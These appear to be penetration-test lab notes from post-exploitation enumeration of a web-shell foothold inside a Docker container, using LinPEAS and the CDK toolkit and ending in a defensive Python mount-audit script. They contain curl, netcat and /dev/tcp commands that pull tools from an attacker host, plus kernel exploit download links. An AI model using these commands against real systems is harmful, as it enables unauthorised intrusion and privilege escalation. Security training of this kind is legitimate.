PEAS


Conducting automated enumeration after completing manual enumeration of the a7c367c2113d host

www-data@a7c367c2113d:/var/www/html/dev/uploads$ curl -s http://192.168.45.153/linpeas.sh -o ./linpeas.sh ; chmod 755 ./linpeas.sh

Delivery complete

Executing PEAS

ENV


╔══════════╣ Environment
 Any private information inside environment variables?
PHP_EXTRA_CONFIGURE_ARGS=--with-apxs2 --disable-cgi
APACHE_CONFDIR=/etc/apache2
HOSTNAME=a7c367c2113d
PHP_INI_DIR=/usr/local/etc/php
SHLVL=2
PHP_EXTRA_BUILD_DEPS=apache2-dev
PHP_LDFLAGS=-Wl,-O1 -pie
APACHE_RUN_DIR=/var/run/apache2
PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
PHP_VERSION=7.2.34
APACHE_PID_FILE=/var/run/apache2/apache2.pid
GPG_KEYS=1729F83938DA44E27BA0F4D3DBDB397470D12172 B1B44D8F021E4E2D6021E995DC9FF8D3EE5AF27F
PHP_ASC_URL=https://www.php.net/distributions/php-7.2.34.tar.xz.asc
PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
_=./linpeas.sh
PHP_URL=https://www.php.net/distributions/php-7.2.34.tar.xz
TERM=xterm-256color
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
APACHE_RUN_GROUP=www-data
APACHE_RUN_USER=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/var/www/html/dev/uploads
PHPIZE_DEPS=autoconf 		dpkg-dev 		file 		g++ 		gcc 		libc-dev 		make 		pkg-config 	re2c
PHP_SHA256=409e11bc6a2c18707dfc44bc61c820ddfd81e17481470f3405ee7822d8379903
APACHE_ENVVARS=/etc/apache2/envvars

CVEs


╔══════════╣ Executing Linux Exploit Suggester
 https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
 
   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
 
[+] [CVE-2022-2586] nft_object UAF
 
   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: less probable
   Tags: ubuntu=(20.04){kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
 
[+] [CVE-2021-27365] linux-iscsi
 
   Details: https://blog.grimm-co.com/2021/03/new-old-bugs-in-linux-kernel.html
   Exposure: less probable
   Tags: RHEL=8
   Download URL: https://codeload.github.com/grimm-co/NotQuite0DayFriday/zip/trunk
   Comments: CONFIG_SLAB_FREELIST_HARDENED must not be enabled
 
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
 
   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded
 
[+] [CVE-2019-15666] XFRM_UAF
 
   Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
   Exposure: less probable
   Download URL: 
   Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled

Container


https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.html

Installed Programs


Interesting Files


CDK


┌──(kali㉿kali)-[~/Tools/CDK]
└─$ nc -lvp 2222 < cdk_linux_amd64
listening on [any] 2222 ...
192.168.122.113: inverse host lookup failed: Unknown host
connect to [192.168.45.153] from (UNKNOWN) [192.168.122.113] 51458
 
www-data@a7c367c2113d:/var/tmp$ cat < /dev/tcp/192.168.45.153/2222 > cdk_linux_amd64
www-data@a7c367c2113d:/var/tmp$ chmod 755 ./cdk_linux_amd64

Delivery complete

www-data@a7c367c2113d:/var/tmp$ ./cdk_linux_amd64 evaluate --full
 
CDK (Container DucK)
CDK Version(GitCommit): b4105424a2f329020c388e6e16a42e9bb31ef501
Zero-dependency cloudnative k8s/docker/serverless penetration toolkit by cdxy & neargle
Find tutorial, configuration and use-case in https://github.com/cdk-team/CDK/
 
[  Information Gathering - System Info  ]
2025/03/06 13:38:05 current dir: /var/tmp
2025/03/06 13:38:05 current user: www-data uid: 33 gid: 33 home: /var/www
2025/03/06 13:38:05 hostname: a7c367c2113d
2025/03/06 13:38:05 debian debian 10.6 kernel: 4.15.0-124-generic
2025/03/06 13:38:05 Setuid files found:
	/usr/bin/chfn
	/usr/bin/chsh
	/usr/bin/gpasswd
	/usr/bin/newgrp
	/usr/bin/passwd
	/bin/mount
	/bin/su
	/bin/umount
 
[  Information Gathering - Services  ]
 
[  Information Gathering - Commands and Capabilities  ]
2025/03/06 13:38:05 available commands:
	curl,find,ps,php,apt,dpkg,apache2,mount,fdisk,gcc,g++,make,base64,perl
2025/03/06 13:38:05 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb):
	CapInh:	00000000a80425fb
	CapPrm:	0000000000000000
	CapEff:	0000000000000000
	CapBnd:	00000000a80425fb
	CapAmb:	0000000000000000
	Cap decode: 0x0000000000000000 = 
[*] Maybe you can exploit the Capabilities below:
 
[  Information Gathering - Mounts  ]
0:50 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/BUDBXCXYL5ZM5A5DB7J7ZWE55B:/var/lib/docker/overlay2/l/4OQE4DJPWJUH7C7VTI7QELZTUQ:/var/lib/docker/overlay2/l/ECNWMYCYO5NUARJRHFBATDKEMI:/var/lib/docker/overlay2/l/6Q7MZHH7PE7MTN3HEYZZETOXA7:/var/lib/docker/overlay2/l/UZXOJXED7IKMHDMWIHEVIDWW3S:/var/lib/docker/overlay2/l/47VNHJWJGAVDNPITBTEL3YF3WU:/var/lib/docker/overlay2/l/ZIKR4QHHNZ4FUC5HKQO5AKPJJV:/var/lib/docker/overlay2/l/36JCICUN34CXMZYJRHINKJCJMV:/var/lib/docker/overlay2/l/MRZJMZYWWNTN5KI7RGPZGO5RX7:/var/lib/docker/overlay2/l/4MGJKN7BQ4FWF5WARROCIB7MMD:/var/lib/docker/overlay2/l/HMWQF2AFFQX5EGSQZOASWXGIF3:/var/lib/docker/overlay2/l/T5LFY3YW3TDCXT4SCJ2WGN6L3R:/var/lib/docker/overlay2/l/NAID7JU6N4ZSFAITKDCMLV7IA5:/var/lib/docker/overlay2/l/6KM4XWZJK45UWRE73I4YBP7BVL:/var/lib/docker/overlay2/l/V3KHVVZFP6YUIQATXFIN3VMIVZ,upperdir=/var/lib/docker/overlay2/0b7f49a727ba0e236459b7378729ae4b1840f95444241cc7858afbad904dc82c/diff,workdir=/var/lib/docker/overlay2/0b7f49a727ba0e236459b7378729ae4b1840f95444241cc7858afbad904dc82c/work
0:67 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
0:68 / /dev rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:69 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
0:70 / /sys ro,nosuid,nodev,noexec,relatime - sysfs sysfs ro
0:71 / /sys/fs/cgroup ro,nosuid,nodev,noexec,relatime - tmpfs tmpfs rw,mode=755
0:29 /docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5 /sys/fs/cgroup/systemd ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,xattr,name=systemd
0:31 /docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5 /sys/fs/cgroup/cpu,cpuacct ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,cpu,cpuacct
0:32 /docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5 /sys/fs/cgroup/devices ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,devices
0:33 /docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5 /sys/fs/cgroup/blkio ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,blkio
0:34 / /sys/fs/cgroup/rdma ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,rdma
0:35 /docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5 /sys/fs/cgroup/freezer ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,freezer
0:36 /docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5 /sys/fs/cgroup/net_cls,net_prio ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,net_cls,net_prio
0:37 /docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5 /sys/fs/cgroup/cpuset ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,cpuset
0:38 /docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5 /sys/fs/cgroup/pids ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,pids
0:39 /docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5 /sys/fs/cgroup/hugetlb ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,hugetlb
0:40 /docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5 /sys/fs/cgroup/perf_event ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,perf_event
0:41 /docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5 /sys/fs/cgroup/memory ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,memory
0:66 / /dev/mqueue rw,nosuid,nodev,noexec,relatime - mqueue mqueue rw
0:72 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k
8:1 /tmp /tmp rw,relatime - ext4 /dev/sda1 rw,errors=remount-ro,data=ordered
8:1 /var/lib/docker/containers/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/sda1 rw,errors=remount-ro,data=ordered
8:1 /var/lib/docker/containers/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5/hostname /etc/hostname rw,relatime - ext4 /dev/sda1 rw,errors=remount-ro,data=ordered
8:1 /var/lib/docker/containers/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5/hosts /etc/hosts rw,relatime - ext4 /dev/sda1 rw,errors=remount-ro,data=ordered
8:1 /home/tom/local.txt /var/www/local.txt rw,relatime - ext4 /dev/sda1 rw,errors=remount-ro,data=ordered
0:67 /bus /proc/bus ro,relatime - proc proc rw
0:67 /fs /proc/fs ro,relatime - proc proc rw
0:67 /irq /proc/irq ro,relatime - proc proc rw
0:67 /sys /proc/sys ro,relatime - proc proc rw
0:67 /sysrq-trigger /proc/sysrq-trigger ro,relatime - proc proc rw
0:73 / /proc/acpi ro,relatime - tmpfs tmpfs ro
0:68 /null /proc/kcore rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:68 /null /proc/keys rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:68 /null /proc/timer_list rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:68 /null /proc/sched_debug rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:74 / /proc/scsi ro,relatime - tmpfs tmpfs ro
0:75 / /sys/firmware ro,relatime - tmpfs tmpfs ro
 
[  Information Gathering - Net Namespace  ]
	container net namespace isolated.
 
[  Information Gathering - Sysctl Variables  ]
2025/03/06 13:38:05 net.ipv4.conf.all.route_localnet = 0
 
[  Information Gathering - DNS-Based Service Discovery  ]
error when requesting coreDNS: lookup any.any.svc.cluster.local. on 8.8.4.4:53: read udp 172.17.0.2:34295->8.8.4.4:53: i/o timeout
error when requesting coreDNS: lookup any.any.any.svc.cluster.local. on 8.8.4.4:53: read udp 172.17.0.2:50258->8.8.4.4:53: i/o timeout
 
[  Discovery - K8s API Server  ]
2025/03/06 13:38:45 checking if api-server allows system:anonymous request.
err found while searching local K8s apiserver addr.:
err: cannot find kubernetes api host in ENV
	api-server forbids anonymous request.
	response:
 
[  Discovery - K8s Service Account  ]
load K8s service account token error.:
open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory
 
[  Discovery - Cloud Provider Metadata API  ]
2025/03/06 13:38:46 failed to dial Alibaba Cloud API.
2025/03/06 13:38:47 failed to dial Azure API.
2025/03/06 13:38:48 failed to dial Google Cloud API.
2025/03/06 13:38:49 failed to dial Tencent Cloud API.
2025/03/06 13:38:50 failed to dial OpenStack API.
2025/03/06 13:38:51 failed to dial Amazon Web Services (AWS) API.
2025/03/06 13:38:52 failed to dial ucloud API.
 
[  Exploit Pre - Kernel Exploits  ]
2025/03/06 13:38:52 refer: https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2021-27365] linux-iscsi
 
   Details: https://blog.grimm-co.com/2021/03/new-old-bugs-in-linux-kernel.html
   Exposure: less probable
   Tags: RHEL=8
   Download URL: https://codeload.github.com/grimm-co/NotQuite0DayFriday/zip/trunk
   Comments: CONFIG_SLAB_FREELIST_HARDENED must not be enabled
 
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
 
   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded
 
[+] [CVE-2019-15666] XFRM_UAF
 
   Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
   Exposure: less probable
   Download URL: 
   Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled
 
 
 
[  Information Gathering - Sensitive Files  ]
	.dockerenv - /.dockerenv
	/.bashrc - /etc/skel/.bashrc
 
[  Information Gathering - ASLR  ]
2025/03/06 13:38:57 /proc/sys/kernel/randomize_va_space file content: 2
2025/03/06 13:38:57 ASLR is enabled.
 
[  Information Gathering - Cgroups  ]
2025/03/06 13:38:57 /proc/1/cgroup file content:
	12:memory:/docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5
	11:perf_event:/docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5
	10:hugetlb:/docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5
	9:pids:/docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5
	8:cpuset:/docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5
	7:net_cls,net_prio:/docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5
	6:freezer:/docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5
	5:rdma:/
	4:blkio:/docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5
	3:devices:/docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5
	2:cpu,cpuacct:/docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5
	1:name=systemd:/docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5
	0::/system.slice/containerd.service
2025/03/06 13:38:57 /proc/self/cgroup file added content (compare pid 1) :

Based on the results above, a container escape does not appear achievable.

However, it's important to note that the host machine's /tmp directory is bind-mounted directly onto the container's /tmp directory (the `8:1 /tmp /tmp rw,relatime - ext4 /dev/sda1` entry in the mount list). Additionally, the `/home/tom/local.txt` mount is a username disclosure: tom.
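As an added example that is not part of these notes or of CDK's own code, the check below parses mount-table lines in the layout CDK printed above and flags host paths bind-mounted into the container (here /tmp and /home/tom/local.txt) while ignoring Docker's own resolv.conf/hostname/hosts injections and the /dev/null-masked /proc entries. The sample lines are constructed from the output above; the local.txt entry is flipped to read-only so both branches of the writable check are exercised.

```python
"""Added example: flag host paths bind-mounted into a container, parsed from mount lines
in the layout CDK printed above (/proc/self/mountinfo minus its two leading mount IDs)."""
import re
from collections import namedtuple

Mount = namedtuple("Mount", "root mountpoint options fstype source")
MAJ_MIN = re.compile(r"^\d+:\d+$")
# Files Docker injects from its own per-container directory: expected, not a disclosure.
DOCKER_MANAGED = re.compile(
    r"^/var/lib/docker/containers/[0-9a-f]{64}/(resolv\.conf|hostname|hosts)$")
BLOCK_FS = {"ext4", "ext3", "xfs", "btrfs"}  # device-backed, i.e. the host's own disk


def parse_mount_line(line):
    """Parse one mountinfo-style line; real mountinfo lines with leading IDs work too."""
    left, sep, right = line.strip().partition(" - ")
    lf, rf = left.split(), right.split()
    if not sep or len(rf) < 2:
        return None
    idx = next((i for i, tok in enumerate(lf) if MAJ_MIN.match(tok)), None)
    if idx is None or len(lf) < idx + 4:
        return None
    return Mount(lf[idx + 1], lf[idx + 2], lf[idx + 3], rf[0], rf[1])


def host_bind_mounts(lines):
    """Return (Mount, writable) pairs that expose a host path inside the container."""
    found = []
    for line in lines:
        m = parse_mount_line(line)
        if m is None or m.fstype not in BLOCK_FS or not m.source.startswith("/dev/"):
            continue  # overlay, proc, tmpfs and /dev/null-masked entries are container-local
        if m.root == "/" or DOCKER_MANAGED.match(m.root):
            continue  # whole device mounted as rootfs, or Docker's own resolv.conf/hosts
        found.append((m, "rw" in m.options.split(",")))
    return found


# Constructed sample modelled on the CDK mount output above (overlay lowerdir shortened).
SAMPLE = """\
0:50 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/X,upperdir=/var/lib/docker/overlay2/Y/diff
0:67 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
8:1 /tmp /tmp rw,relatime - ext4 /dev/sda1 rw,errors=remount-ro,data=ordered
8:1 /var/lib/docker/containers/{cid}/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/sda1 rw,errors=remount-ro,data=ordered
8:1 /home/tom/local.txt /var/www/local.txt ro,relatime - ext4 /dev/sda1 rw,errors=remount-ro,data=ordered
0:68 /null /proc/kcore rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
""".format(cid="a" * 64).splitlines()

if __name__ == "__main__":
    for m, writable in host_bind_mounts(SAMPLE):
        print(f"host {m.root} -> {m.mountpoint} ({'WRITABLE' if writable else 'read-only'})")
```

Run it against `cat /proc/self/mountinfo` inside a container to audit what the host has shared with it; a writable host directory such as /tmp is the finding worth remediating.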